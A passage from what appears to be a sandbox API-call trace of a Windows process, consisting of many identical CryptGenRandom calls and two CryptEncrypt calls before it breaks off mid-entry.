out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.403] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.404] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.405] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.406] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.406] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, 